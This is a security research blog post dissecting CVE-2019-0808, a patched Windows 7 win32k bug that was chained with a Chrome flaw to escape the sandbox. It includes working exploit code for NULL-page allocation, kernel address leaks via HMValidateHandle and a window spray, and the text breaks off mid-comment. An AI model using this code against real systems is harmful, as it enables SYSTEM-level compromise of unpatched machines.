

This post explores a recently patched Win32k vulnerability (CVE-2019-0808) that was used in the wild with CVE-2019-5786 to provide a full Google Chrome sandbox escape chain.

Overview

On March 7th 2019, Google published a blog post discussing two vulnerabilities that were being chained together in the wild to remotely exploit Chrome users running Windows 7 x86: CVE-2019-5786, a bug in the Chrome renderer that has been detailed in our blog post, and CVE-2019-0808, a NULL pointer dereference bug in win32k.sys affecting Windows 7 and Windows Server 2008 which allowed attackers to escape the Chrome sandbox and execute arbitrary code as the SYSTEM user.

Since Google’s blog post, there has been one crash PoC exploit for Windows 7 x86 posted to GitHub by ze0r, which results in a BSOD. This blog details a working sandbox escape and a demonstration of the full exploit chain in action, which utilizes these two bugs to illustrate the APT attack encountered by Google in the wild.

Analysis of the Public PoC

To provide appropriate context for the rest of this blog, we start with an analysis of the public PoC code. The first operation conducted within the PoC code is the creation of two modeless drag-and-drop popup menus, hMenuRoot and hMenuSub. hMenuRoot will then be set up as the primary drop down menu, and hMenuSub will be configured as its submenu.

HMENU hMenuRoot = CreatePopupMenu();

HMENU hMenuSub = CreatePopupMenu();

...

MENUINFO mi = { 0 };

mi.cbSize = sizeof(MENUINFO);

mi.fMask = MIM_STYLE;

mi.dwStyle = MNS_MODELESS | MNS_DRAGDROP;

SetMenuInfo(hMenuRoot, &mi);

SetMenuInfo(hMenuSub, &mi);

AppendMenuA(hMenuRoot, MF_BYPOSITION | MF_POPUP, (UINT_PTR)hMenuSub, "Root");

AppendMenuA(hMenuSub, MF_BYPOSITION | MF_POPUP, 0, "Sub");



Following this, a WH_CALLWNDPROC hook is installed on the current thread using SetWindowsHookEx(). This hook will ensure that WindowHookProc() is executed prior to a window procedure being executed. Once this is done, SetWinEventHook() is called to set an event hook to ensure that DisplayEventProc() is called when a popup menu is displayed.

SetWindowsHookEx(WH_CALLWNDPROC, (HOOKPROC)WindowHookProc, hInst, GetCurrentThreadId());

SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, hInst, DisplayEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0);

The following diagram shows the window message call flow before and after setting the WH_CALLWNDPROC hook.

Once the hooks have been installed, the hWndFakeMenu window will be created using CreateWindowA() with the class string “#32768”, which, according to MSDN, is the system reserved string for a menu class. Creating a window in this manner will cause CreateWindowA() to set many data fields within the window object to a value of 0 or NULL as CreateWindowA() does not know how to fill them in appropriately. One of these fields which is of importance to this exploit is the spMenu field, which will be set to NULL.

hWndFakeMenu = CreateWindowA("#32768", "MN", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);

hWndMain is then created using CreateWindowA() with the window class wndClass. This will set hWndMain’s window procedure to DefWindowProc(), which is a function in the Windows API responsible for handling any window messages not handled by the window itself.

The parameters for CreateWindowA() also ensure that hWndMain is created in disabled mode so that it will not receive any keyboard or mouse input from the end user, but can still receive other window messages from other windows, the system, or the application itself. This is done as a preventative measure to ensure the user doesn’t accidentally interact with the window in an adverse manner, such as repositioning it to an unexpected location. Finally, the last parameters for CreateWindowA() ensure that the window is positioned at (0x0, 0x0), and that the window is 1 pixel by 1 pixel in size. This can be seen in the code below.

WNDCLASSEXA wndClass = { 0 };

wndClass.cbSize = sizeof(WNDCLASSEXA);

wndClass.lpfnWndProc = DefWindowProc;

wndClass.cbClsExtra = 0;

wndClass.cbWndExtra = 0;

wndClass.hInstance = hInst;

wndClass.lpszMenuName = 0;

wndClass.lpszClassName = "WNDCLASSMAIN";

RegisterClassExA(&wndClass);

hWndMain = CreateWindowA("WNDCLASSMAIN", "CVE", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);

TrackPopupMenuEx(hMenuRoot, 0, 0, 0, hWndMain, NULL);

MSG msg = { 0 };

while (GetMessageW(&msg, NULL, 0, 0))

{

TranslateMessage(&msg);

DispatchMessageW(&msg);

if (iMenuCreated >= 1) {

bOnDraging = TRUE;

callNtUserMNDragOverSysCall(&pt, buf);

break;

}

}

After the hWndMain window is created, TrackPopupMenuEx() is called to display hMenuRoot. This will result in a window message being placed on hWndMain’s message queue, which will be retrieved in main()’s message loop via GetMessageW(), translated via TranslateMessage(), and subsequently sent to hWndMain’s window procedure via DispatchMessageW(). This will result in the window procedure hook being executed, which will call WindowHookProc().

BOOL bOnDraging = FALSE;

....

LRESULT CALLBACK WindowHookProc(INT code, WPARAM wParam, LPARAM lParam)

{

tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;

if (!bOnDraging) {

return CallNextHookEx(0, code, wParam, lParam);

}

....

As the bOnDraging variable is not yet set, the WindowHookProc() function will simply call CallNextHookEx() to call the next available hook. This will cause an EVENT_SYSTEM_MENUPOPUPSTART event to be sent as a result of the popup menu being created. This event message will be caught by the event hook and will cause execution to be diverted to the function DisplayEventProc().

UINT iMenuCreated = 0;

VOID CALLBACK DisplayEventProc(HWINEVENTHOOK hWinEventHook, DWORD event, HWND hwnd, LONG idObject, LONG idChild, DWORD idEventThread, DWORD dwmsEventTime)

{

switch (iMenuCreated)

{

case 0:

SendMessageW(hwnd, WM_LBUTTONDOWN, 0, 0x00050005);

break;

case 1:

SendMessageW(hwnd, WM_MOUSEMOVE, 0, 0x00060006);

break;

}

printf("[*] MSG\n");

iMenuCreated++;

}

Since this is the first time DisplayEventProc() is being executed, iMenuCreated will be 0, which will cause case 0 to be executed. This case will send the WM_LBUTTONDOWN window message to hWndMain using SendMessageW() in order to select the hMenuRoot menu at point (0x5, 0x5). Once this message has been placed onto hWndMain’s window message queue, iMenuCreated is incremented.
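The lParam values 0x00050005 and 0x00060006 passed to SendMessageW() encode a point: mouse messages carry the x coordinate in the low 16 bits and the y coordinate in the high 16 bits. The following is a minimal, portable sketch of that packing. The helper names packPoint(), pointX(), and pointY() are hypothetical and exist only for illustration; on Windows the MAKELPARAM, GET_X_LPARAM, and GET_Y_LPARAM macros serve the same purpose.

```cpp
#include <cstdint>

// Pack a point the way mouse messages expect it in lParam:
// x occupies the low 16 bits, y occupies the high 16 bits.
constexpr std::uint32_t packPoint(std::uint16_t x, std::uint16_t y) {
    return static_cast<std::uint32_t>(x) |
           (static_cast<std::uint32_t>(y) << 16);
}

// Recover the x coordinate from a packed lParam value.
constexpr std::uint16_t pointX(std::uint32_t lParam) {
    return static_cast<std::uint16_t>(lParam & 0xFFFFu);
}

// Recover the y coordinate from a packed lParam value.
constexpr std::uint16_t pointY(std::uint32_t lParam) {
    return static_cast<std::uint16_t>(lParam >> 16);
}
```

With these helpers, packPoint(5, 5) yields the value sent with WM_LBUTTONDOWN and packPoint(6, 6) yields the value sent with WM_MOUSEMOVE.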

hWndMain then processes the WM_LBUTTONDOWN message and selects hMenuRoot, which will result in hMenuSub being displayed. This will trigger a second EVENT_SYSTEM_MENUPOPUPSTART event, resulting in DisplayEventProc() being executed again. This time around the second case is executed as iMenuCreated is now 1. This case will use SendMessageW() to send a WM_MOUSEMOVE message that moves the mouse to point (0x6, 0x6) on the user’s desktop. Since the left mouse button is still down, this will make it seem like a drag and drop operation is being performed. Following this, iMenuCreated is incremented once again and execution returns to the following code with the message loop inside main().

CHAR buf[0x100] = { 0 };

POINT pt;

pt.x = 2;

pt.y = 2;

...

if (iMenuCreated >= 1) {

bOnDraging = TRUE;

callNtUserMNDragOverSysCall(&pt, buf);

break;

}

Since iMenuCreated now holds a value of 2, the code inside the if statement will be executed, which will set bOnDraging to TRUE to indicate the drag operation was conducted with the mouse, after which a call will be made to the function callNtUserMNDragOverSysCall() with the address of the POINT structure pt and the 0x100 byte long output buffer buf.

callNtUserMNDragOverSysCall() is a wrapper function which makes a syscall to NtUserMNDragOver() in win32k.sys using the syscall number 0x11ED, which is the syscall number for NtUserMNDragOver() on Windows 7 and Windows 7 SP1. Syscalls are used in favor of the PoC’s method of obtaining the address of NtUserMNDragOver() from user32.dll since syscall numbers tend to change only across OS versions and service packs (a notable exception being Windows 10 which undergoes more constant changes), whereas the offsets between the exported functions in user32.dll and the unexported NtUserMNDragOver() function can change anytime user32.dll is updated.

void callNtUserMNDragOverSysCall(LPVOID address1, LPVOID address2) {

_asm {

mov eax, 0x11ED

push address2

push address1

mov edx, esp

int 0x2E

pop eax

pop eax

}

}

NtUserMNDragOver() will end up calling xxxMNFindWindowFromPoint(), which will execute xxxSendMessage() to issue a usermode callback of type WM_MN_FINDMENUWINDOWFROMPOINT. The value returned from the user mode callback is then checked using HMValidateHandle() to ensure it is a handle to a window object.

LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)

{

....

v6 = xxxSendMessage(

var_pPopupMenu->spwndNextPopup,

MN_FINDMENUWINDOWFROMPOINT,

(WPARAM)&pPopupMenu,

(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the

// MN_FINDMENUWINDOWFROMPOINT usermode callback

// using the address of pPopupMenu as the

// wParam argument.

ThreadUnlock1();

if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user

// mode callback is a handle to a MFMWFP window.

v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned

// handle is a handle to

// a window object. Set v1 to

// TRUE if all is good.

...

When the callback is performed, the window procedure hook function, WindowHookProc(), will be executed before the intended window procedure is executed. This function will check to see what type of window message was received. If the incoming window message is a WM_MN_FINDMENUWINDOWFROMPOINT message, the following code will be executed.

if ((cwp->message == WM_MN_FINDMENUWINDOWFROMPOINT))

{

bIsDefWndProc = FALSE;

printf("[*] HWND: %p \n", cwp->hwnd);

SetWindowLongPtr(cwp->hwnd, GWLP_WNDPROC, (LONG_PTR)SubMenuProc);

}

return CallNextHookEx(0, code, wParam, lParam);

This code will change the window procedure for hWndMain from DefWindowProc() to SubMenuProc(). It will also set bIsDefWndProc to FALSE to indicate that the window procedure for hWndMain is no longer DefWindowProc().

Once the hook exits, hWndMain’s window procedure is executed. However, since the window procedure for the hWndMain window was changed to SubMenuProc(), SubMenuProc() is executed instead of the expected DefWindowProc() function.

SubMenuProc() will first check if the incoming message is of type WM_MN_FINDMENUWINDOWFROMPOINT. If it is, SubMenuProc() will call SetWindowLongPtr() to set the window procedure for hWndMain back to DefWindowProc() so that hWndMain can handle any additional incoming window messages. This will prevent the application from becoming unresponsive. SubMenuProc() will then return hWndFakeMenu, the handle to the window that was created using the menu class string.

LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)

{

if (msg == WM_MN_FINDMENUWINDOWFROMPOINT)

{

SetWindowLongPtr(hwnd, GWLP_WNDPROC, (LONG_PTR)DefWindowProc);

return (LRESULT)hWndFakeMenu;

}

return DefWindowProc(hwnd, msg, wParam, lParam);

}
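The hook and procedure swap described above can be modelled without any Windows APIs. The sketch below is a simplified simulation, not the PoC's code: FakeWindow, hookBeforeDispatch(), sendMessage(), and kFakeMenuHandle are hypothetical names, and the message value 0x1EB is assumed to match the constant the public PoC uses for WM_MN_FINDMENUWINDOWFROMPOINT.

```cpp
#include <cstdint>

struct FakeWindow;
using WndProc = std::uintptr_t (*)(FakeWindow&, unsigned msg);

// Hypothetical model of a window: a handle plus a replaceable procedure.
struct FakeWindow {
    std::uintptr_t handle;
    WndProc proc;
};

// Assumed value of WM_MN_FINDMENUWINDOWFROMPOINT.
constexpr unsigned kFindMenuWindowFromPoint = 0x1EB;
// Stand-in for hWndFakeMenu.
constexpr std::uintptr_t kFakeMenuHandle = 0x1234;

// Plays the role of DefWindowProc(): it returns nothing interesting.
std::uintptr_t defaultProc(FakeWindow&, unsigned) { return 0; }

// Plays the role of SubMenuProc(): restore the default procedure first,
// then hand back the attacker-chosen handle.
std::uintptr_t subMenuProc(FakeWindow& wnd, unsigned msg) {
    if (msg == kFindMenuWindowFromPoint) {
        wnd.proc = defaultProc;
        return kFakeMenuHandle;
    }
    return defaultProc(wnd, msg);
}

// Plays the role of the WH_CALLWNDPROC hook: it runs before the window
// procedure and may replace it while the drag operation is in progress.
void hookBeforeDispatch(FakeWindow& wnd, unsigned msg, bool dragging) {
    if (dragging && msg == kFindMenuWindowFromPoint) {
        wnd.proc = subMenuProc;
    }
}

// Deliver a message: run the hook, then whichever procedure is installed.
std::uintptr_t sendMessage(FakeWindow& wnd, unsigned msg, bool dragging) {
    hookBeforeDispatch(wnd, msg, dragging);
    return wnd.proc(wnd, msg);
}
```

In this model the swap is one-shot: the single message of interest is answered with the fake handle, and every later message reaches the default procedure again.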

Since hWndFakeMenu is a valid window handle, it will pass the HMValidateHandle() check. However, as mentioned previously, many of the window’s elements will be set to 0 or NULL as CreateWindowA() tried to create a window as a menu without sufficient information. Execution will subsequently proceed from xxxMNFindWindowFromPoint() to xxxMNUpdateDraggingInfo(), which will perform a call to MNGetpItem(), which will in turn call MNGetpItemFromIndex().

MNGetpItemFromIndex() will then try to access offsets within hWndFakeMenu’s spMenu field. However, since hWndFakeMenu’s spMenu field is set to NULL, this will result in a NULL pointer dereference, and a kernel crash if the NULL page has not been allocated.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)

{

tagITEM *result; // eax

if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur

// here if spMenu is NULL.

result = 0;

else

result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;

return result;

}
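To make the consequence of this lookup concrete, the bounds check and address arithmetic can be modelled in portable C++. This is a sketch under stated assumptions: MenuFields is a hypothetical, simplified stand-in for the two tagMENU fields the function reads (it does not reproduce the real structure layout), and itemAddress() is an illustrative name. The 0x6C stride is taken from the decompiled code above.

```cpp
#include <cstdint>

constexpr std::uint32_t kItemSize = 0x6C;            // stride between items
constexpr std::uint32_t kInvalidIndex = 0xFFFFFFFFu; // the "-1" index

// Hypothetical stand-in for the fields read through spMenu.
struct MenuFields {
    std::uint32_t cItems;   // number of items in the menu
    std::uint32_t rgItems;  // 32-bit address of the first item
};

// Mirrors the lookup: returns 0 when the index is rejected, otherwise
// the address of the requested item.
constexpr std::uint32_t itemAddress(const MenuFields& menu,
                                    std::uint32_t index) {
    if (index == kInvalidIndex || index >= menu.cItems) {
        return 0;
    }
    return menu.rgItems + kItemSize * index;
}
```

If the NULL page is mapped by the attacker, both fields are read from memory the attacker controls, so the address returned by the lookup is attacker-chosen as well.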

Sandbox Limitations

To better understand how to escape Chrome’s sandbox, it is important to understand how it operates. Most of the important details of the Chrome sandbox are explained on Google’s Sandbox page. Reading this page reveals several important details about the Chrome sandbox which are relevant to this exploit. These are listed below:

- All processes in the Chrome sandbox run at Low Integrity.

- A restrictive job object is applied to the process token of all the processes running in the Chrome sandbox. This prevents the spawning of child processes, amongst other things.

- Processes running in the Chrome sandbox run in an isolated desktop, separate from the main desktop and the service desktop to prevent Shatter attacks that could result in privilege escalation.



- On Windows 8 and higher the Chrome sandbox prevents calls to win32k.sys.

The first protection in this list is that processes running inside the sandbox run with Low integrity. Running at Low integrity prevents attackers from being able to exploit a number of kernel leaks mentioned on sam-b’s kernel leak page, as starting with Windows 8.1, most of these leaks require that the process be running with Medium integrity or higher. This limitation is bypassed in the exploit by abusing a well known memory leak in the implementation of HMValidateHandle() on Windows versions prior to Windows 10 RS4, and is discussed in more detail later in the blog.

The next limitation is the restricted job object and token that are placed on the sandboxed process. The restricted token ensures that the sandboxed process runs without any permissions, whilst the job object ensures that the sandboxed process cannot spawn any child processes. The combination of these two mitigations means that to escape the sandbox the attacker will likely have to create their own process token or steal another process token, and then subsequently disassociate the job object from that token. Given the permissions this requires, this most likely will require a kernel level vulnerability. These two mitigations are the most relevant to the exploit; their bypasses are discussed in more detail later on in this blog.

The job object additionally ensures that the sandboxed process uses what Google calls the “alternate desktop” (known in Windows terminology as the “limited desktop”), which is a desktop separate from the main user desktop and the service desktop, to prevent potential privilege escalations via window messages. This is done because Windows prevents window messages from being sent between desktops, which restricts the attacker to only sending window messages to windows that are created within the sandbox itself. Thankfully this particular exploit only requires interaction with windows created within the sandbox, so this mitigation only really has the effect of making it so that the end user can’t see any of the windows and menus the exploit creates.

Finally it’s worth noting that whilst protections were introduced in Windows 8 to allow Chrome to prevent sandboxed applications from making syscalls to win32k.sys, these controls were not backported to Windows 7. As a result Chrome’s sandbox does not have the ability to prevent calls to win32k.sys on Windows 7 and prior, which means that attackers can abuse vulnerabilities within win32k.sys to escape the Chrome sandbox on these versions of Windows.

Sandbox Exploit Explanation



Creating a DLL for the Chrome Sandbox

As is explained in James Forshaw’s In-Console-Able blog post, it is not possible to inject just any DLL into the Chrome sandbox. Due to sandbox limitations, the DLL has to be created in such a way that it does not load any other libraries or manifest files.

To achieve this, the Visual Studio project for the PoC exploit was first adjusted so that the project type would be set to a DLL instead of an EXE. After this, the C++ compiler settings were changed to tell it to use the multi-threaded runtime library (not a multithreaded DLL). Finally the linker settings were changed to instruct Visual Studio not to generate manifest files.



Once this was done, Visual Studio was able to produce DLLs that could be loaded into the Chrome sandbox via a vulnerability such as István Kurucsai’s 1Day Chrome vulnerability, CVE-2019-5786 (which was detailed in a previous blog post), or via DLL injection with a program such as this one.





Explanation of the Existing Limited Write Primitive

Before diving into the details of how the exploit was converted into a sandbox escape, it is important to understand the limited write primitive that this exploit grants an attacker should they successfully set up the NULL page, as this provides the basis for the discussion that occurs throughout the following sections.

Once the vulnerability has been triggered, xxxMNUpdateDraggingInfo() will be called in win32k.sys. If the NULL page has been set up correctly, then xxxMNUpdateDraggingInfo() will call xxxMNSetGapState(), whose code is shown below:

void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)

{

...

var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write

// operation should occur, minus an

// offset of 0x4.

temp_var_PITEM = var_PITEM;

if ( var_PITEM )

{

...

var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the

// address where the second write operation

// should occur, minus an offset of 0x4. This

// address will be 0x6C bytes earlier in

// memory than the address in var_PITEM.

if ( fSet )

{

*((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the

// attacker controlled address.

if ( var_PITEM_Minus_Offset_Of_0x6C )

{

*((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u;

// Conduct the second write to the attacker

// controlled address minus 0x68 (0x6C-0x4).

...

xxxMNSetGapState() performs two write operations to an attacker controlled location plus an offset of 4. The only difference between the two write operations is that 0x40000000 is written to an address located 0x6C bytes earlier than the address where the 0x80000000 write is conducted.

It is also important to note that the writes are conducted using OR operations. This means that the attacker can only add bits to the DWORD they choose to write to; it is not possible to remove or alter bits that are already there. Additionally, even if an attacker starts their write at some offset, they will still only be able to write the value \x40 or \x80 to an address at best.
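The two writes can be simulated on an ordinary byte buffer to show exactly which bits change. The sketch below is illustrative only: orDword(), readDword(), and simulateGapStateWrites() are hypothetical helpers, and the buffer stands in for attacker-reachable memory. The caller is assumed to pass an itemOffset of at least 0x6C with at least 8 bytes remaining after it.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// OR a 32-bit value into the buffer at the given byte offset.
inline void orDword(std::vector<std::uint8_t>& mem, std::size_t offset,
                    std::uint32_t bits) {
    std::uint32_t value;
    std::memcpy(&value, mem.data() + offset, sizeof value);
    value |= bits;  // bits can be set but never cleared
    std::memcpy(mem.data() + offset, &value, sizeof value);
}

// Read a 32-bit value back from the buffer.
inline std::uint32_t readDword(const std::vector<std::uint8_t>& mem,
                               std::size_t offset) {
    std::uint32_t value;
    std::memcpy(&value, mem.data() + offset, sizeof value);
    return value;
}

// Model the two writes: itemOffset is where the "current item" lives.
inline void simulateGapStateWrites(std::vector<std::uint8_t>& mem,
                                   std::size_t itemOffset) {
    // First write: item + 4.
    orDword(mem, itemOffset + 4, 0x80000000u);
    // Second write: the previous item (0x6C bytes earlier) + 4.
    orDword(mem, itemOffset - 0x6C + 4, 0x40000000u);
}
```

Running the simulation twice leaves the buffer unchanged after the first pass, which illustrates why the primitive can only ever add the 0x80000000 or 0x40000000 bit to a DWORD.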

From these observations it becomes apparent that the attacker will require a more powerful write primitive if they wish to escape the Chrome sandbox. To meet this requirement, Exodus Intelligence’s exploit utilizes the limited write primitive to create a more powerful write primitive by abusing tagWND objects. The details of how this is done, along with the steps required to escape the sandbox, are explained in more detail in the following sections.



Allocating the NULL Page

On Windows versions prior to Windows 8, it is possible to allocate memory in the NULL page from userland by calling NtAllocateVirtualMemory(). Within the PoC code, the main() function was adjusted to obtain the address of NtAllocateVirtualMemory() from ntdll.dll and save it into the variable pfnNtAllocateVirtualMemory.

Once this is done, allocateNullPage() is called to allocate the NULL page itself, using address 0x1, with read, write, and execute permissions. The address 0x1 will then be rounded down to 0x0 by NtAllocateVirtualMemory() to fit on a page boundary, thereby allowing the attacker to allocate memory at 0x0.

typedef NTSTATUS(WINAPI *NTAllocateVirtualMemory)(

HANDLE ProcessHandle,

PVOID *BaseAddress,

ULONG_PTR ZeroBits,

PSIZE_T RegionSize,

ULONG AllocationType,

ULONG Protect

);

NTAllocateVirtualMemory pfnNtAllocateVirtualMemory = 0;

....

pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");

....

// Thanks to https://github.com/YeonExp/HEVD/blob/c19ad75ceab65cff07233a72e2e765be866fd636/NullPointerDereference/NullPointerDereference/main.cpp#L56 for

// explaining this in an example along with the finer details that are often forgotten.

bool allocateNullPage() {

/* Set the base address at which the memory will be allocated to 0x1.

This is done since a value of 0x0 will not be accepted by NtAllocateVirtualMemory,

however due to page alignment requirements the 0x1 will be rounded down to 0x0 internally.*/

PVOID BaseAddress = (PVOID)0x1;

/* Set the size to be allocated to 40960 to ensure that there

is plenty of memory allocated and available for use. */

SIZE_T size = 40960;

/* Call NtAllocateVirtualMemory to allocate the virtual memory at address 0x0 with the size

specified in the variable size. Also make sure the memory is allocated with read, write,

and execute permissions.*/

NTSTATUS result = pfnNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0x0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);

// If the call to NtAllocateVirtualMemory failed, return FALSE.

if (result != 0x0) {

return FALSE;

}

// If the code reaches this point, then everything went well, so return TRUE.

return TRUE;

}
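The rounding that turns a requested base address of 0x1 into 0x0 is plain page alignment arithmetic. The sketch below shows it in portable C++, assuming 4 KiB pages as on x86. The helper names are hypothetical, and pagesCovering() only computes how many whole pages are needed to cover a byte range; it does not claim to reproduce the kernel's exact bookkeeping.

```cpp
#include <cstdint>

constexpr std::uint32_t kPageSize = 0x1000;  // 4 KiB pages assumed (x86)

// Round an address down to the start of the page that contains it.
constexpr std::uint32_t roundDownToPage(std::uint32_t address) {
    return address & ~(kPageSize - 1);
}

// Number of whole pages needed to cover the bytes
// [base, base + size - 1]. Assumes size > 0.
constexpr std::uint32_t pagesCovering(std::uint32_t base,
                                      std::uint32_t size) {
    return (roundDownToPage(base + size - 1) - roundDownToPage(base)) /
               kPageSize + 1;
}
```

Under these assumptions, roundDownToPage(0x1) evaluates to 0x0, which is why a request at address 0x1 ends up covering the NULL page.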

Finding the Address of HMValidateHandle

Once the NULL page has been allocated the exploit will then obtain the address of the HMValidateHandle() function. HMValidateHandle() is useful for attackers as it allows them to obtain a userland copy of any object provided that they have a handle. Additionally this leak also works at Low Integrity on Windows versions prior to Windows 10 RS4.

By abusing this functionality to copy objects which contain a pointer to their location in kernel memory, such as tagWND (the window object), into user mode memory, an attacker can leak the addresses of various objects simply by obtaining a handle to them.

As the address of HMValidateHandle() is not exported from user32.dll, an attacker cannot directly obtain the address of HMValidateHandle() via user32.dll’s export table. Instead, the attacker must find another function that user32.dll exports which calls HMValidateHandle(), read the relative offset encoded in that call instruction, and then perform some math to calculate the true address of HMValidateHandle().

This is done by obtaining the address of the exported function IsMenu() from user32.dll and then searching for the first instance of the byte \xE8 within IsMenu()’s code, which is the opcode of the relative call to HMValidateHandle(). By then performing some math on the base address of user32.dll, the relative offset in the call, and the offset of IsMenu() from the start of user32.dll, the attacker can obtain the address of HMValidateHandle(). This can be seen in the following code.

HMODULE hUser32 = LoadLibraryW(L"user32.dll");

LoadLibraryW(L"gdi32.dll");

// Find the address of HMValidateHandle using the address of user32.dll

if (findHMValidateHandleAddress(hUser32) == FALSE) {

printf("[!] Couldn't locate the address of HMValidateHandle!\r\n");

ExitProcess(-1);

}

...

BOOL findHMValidateHandleAddress(HMODULE hUser32) {

// The address of the function HMValidateHandle() is not exported to

// the public. However the function IsMenu() contains a call to HMValidateHandle()

// within it after some short setup code. The call starts with the byte \xE8.

// Obtain the address of the function IsMenu() from user32.dll.

BYTE * pIsMenuFunction = (BYTE *)GetProcAddress(hUser32, "IsMenu");

if (pIsMenuFunction == NULL) {

printf("[!] Failed to find the address of IsMenu within user32.dll.\r\n");

return FALSE;

}

else {

printf("[*] pIsMenuFunction: 0x%08X\r\n", pIsMenuFunction);

}

// Search for the location of the \xE8 byte within the IsMenu() function

// to find the start of the relative call to HMValidateHandle().

unsigned int offsetInIsMenuFunction = 0;

BOOL foundHMValidateHandleAddress = FALSE;

for (unsigned int i = 0; i < 0x1000; i++) {

BYTE* pCurrentByte = pIsMenuFunction + i;

if (*pCurrentByte == 0xE8) {

offsetInIsMenuFunction = i + 1;

break;

}

}

// Throw error and exit if the \xE8 byte couldn't be located.

if (offsetInIsMenuFunction == 0) {

printf("[!] Couldn't find offset to HMValidateHandle within IsMenu.\r\n");

return FALSE;

}

// Output address of user32.dll in memory for debugging purposes.

printf("[*] hUser32: 0x%08X\r\n", hUser32);

// Get the value of the relative address being called within the IsMenu() function.

unsigned int relativeAddressBeingCalledInIsMenu = *(unsigned int *)(pIsMenuFunction + offsetInIsMenuFunction);

printf("[*] relativeAddressBeingCalledInIsMenu: 0x%08X\r\n", relativeAddressBeingCalledInIsMenu);

// Find out how far the IsMenu() function is located from the base address of user32.dll.

unsigned int addressOfIsMenuFromStartOfUser32 = ((unsigned int)pIsMenuFunction - (unsigned int)hUser32);

printf("[*] addressOfIsMenuFromStartOfUser32: 0x%08X\r\n", addressOfIsMenuFromStartOfUser32);

// Take this offset and add to it the relative address used in the call to HMValidateHandle().

// Result should be the offset of HMValidateHandle() from the start of user32.dll.

unsigned int offset = addressOfIsMenuFromStartOfUser32 + relativeAddressBeingCalledInIsMenu;

printf("[*] offset: 0x%08X\r\n", offset);

// Skip over 11 bytes since on Windows 10 these are not NOPs and it would be

// ideal if this code could be reused in the future.

pHmValidateHandle = (lHMValidateHandle)((unsigned int)hUser32 + offset + 11);

printf("[*] pHmValidateHandle: 0x%08X\r\n", pHmValidateHandle);

return TRUE;

}
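The general rule behind this calculation is that an x86 near call (opcode 0xE8) stores a signed 32-bit displacement relative to the address of the instruction that follows the call, which is 5 bytes after the opcode. The following portable sketch applies that rule to a byte buffer. It is an illustration rather than the exploit's code: resolveFirstRelativeCall() is a hypothetical helper, and a naive byte scan like this can misfire if 0xE8 appears inside the operand of an earlier instruction.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Scan 'code' (loaded at 32-bit address 'codeAddress') for the first
// 0xE8 byte and compute the absolute target of that relative call.
// Returns false if no complete call instruction is found.
inline bool resolveFirstRelativeCall(const std::vector<std::uint8_t>& code,
                                     std::uint32_t codeAddress,
                                     std::uint32_t& target) {
    for (std::size_t i = 0; i + 5 <= code.size(); ++i) {
        if (code[i] != 0xE8) {
            continue;
        }
        // Assemble the little-endian rel32 operand byte by byte.
        const std::uint32_t rel =
            static_cast<std::uint32_t>(code[i + 1]) |
            (static_cast<std::uint32_t>(code[i + 2]) << 8) |
            (static_cast<std::uint32_t>(code[i + 3]) << 16) |
            (static_cast<std::uint32_t>(code[i + 4]) << 24);
        // The displacement is relative to the next instruction.
        const std::uint32_t next =
            codeAddress + static_cast<std::uint32_t>(i) + 5;
        // Unsigned wrap-around handles negative displacements.
        target = next + rel;
        return true;
    }
    return false;
}
```

Because the arithmetic is done modulo 2^32, a backwards call (negative displacement) resolves correctly without any signed conversions.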







Creating an Arbitrary Kernel Address Write Primitive with Window Objects



Once the address of HMValidateHandle() has been obtained, the exploit will call the sprayWindows() function. The first thing that sprayWindows() does is register a new window class named sprayWindowClass using RegisterClassExW(). The sprayWindowClass will also be set up such that any windows created with this class will use the attacker defined window procedure sprayCallback().

A HWND table named hwndSprayHandleTable will then be created, and a loop will be conducted which will call CreateWindowExW() to create 0x100 tagWND objects of class sprayWindowClass and save their handles into hwndSprayHandleTable. Once this spray is complete, two loops will be used, one nested inside the other, to obtain a userland copy of each of the tagWND objects using HMValidateHandle().

The kernel address for each of these tagWND objects is then obtained by examining the tagWND object’s pSelf field. The kernel address of each tagWND object is compared with the others until two tagWND objects are found that are less than 0x3FD00 apart in kernel memory, at which point the loops are terminated.

/* The following definitions define the various structures

needed within sprayWindows() */

typedef struct _HEAD

{

HANDLE h;

DWORD cLockObj;

} HEAD, *PHEAD;

typedef struct _THROBJHEAD

{

HEAD h;

PVOID pti;

} THROBJHEAD, *PTHROBJHEAD;

typedef struct _THRDESKHEAD

{

THROBJHEAD h;

PVOID rpdesk;

PVOID pSelf; // points to the kernel mode address of the object

} THRDESKHEAD, *PTHRDESKHEAD;

....

// Spray the windows and find two that are less than 0x3fd00 apart in memory.

if (sprayWindows() == FALSE) {

printf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n");

ExitProcess(-1);

}

....

// Define the HMValidateHandle window type TYPE_WINDOW appropriately.

#define TYPE_WINDOW 1

/* Main function for spraying the tagWND objects into memory and finding two

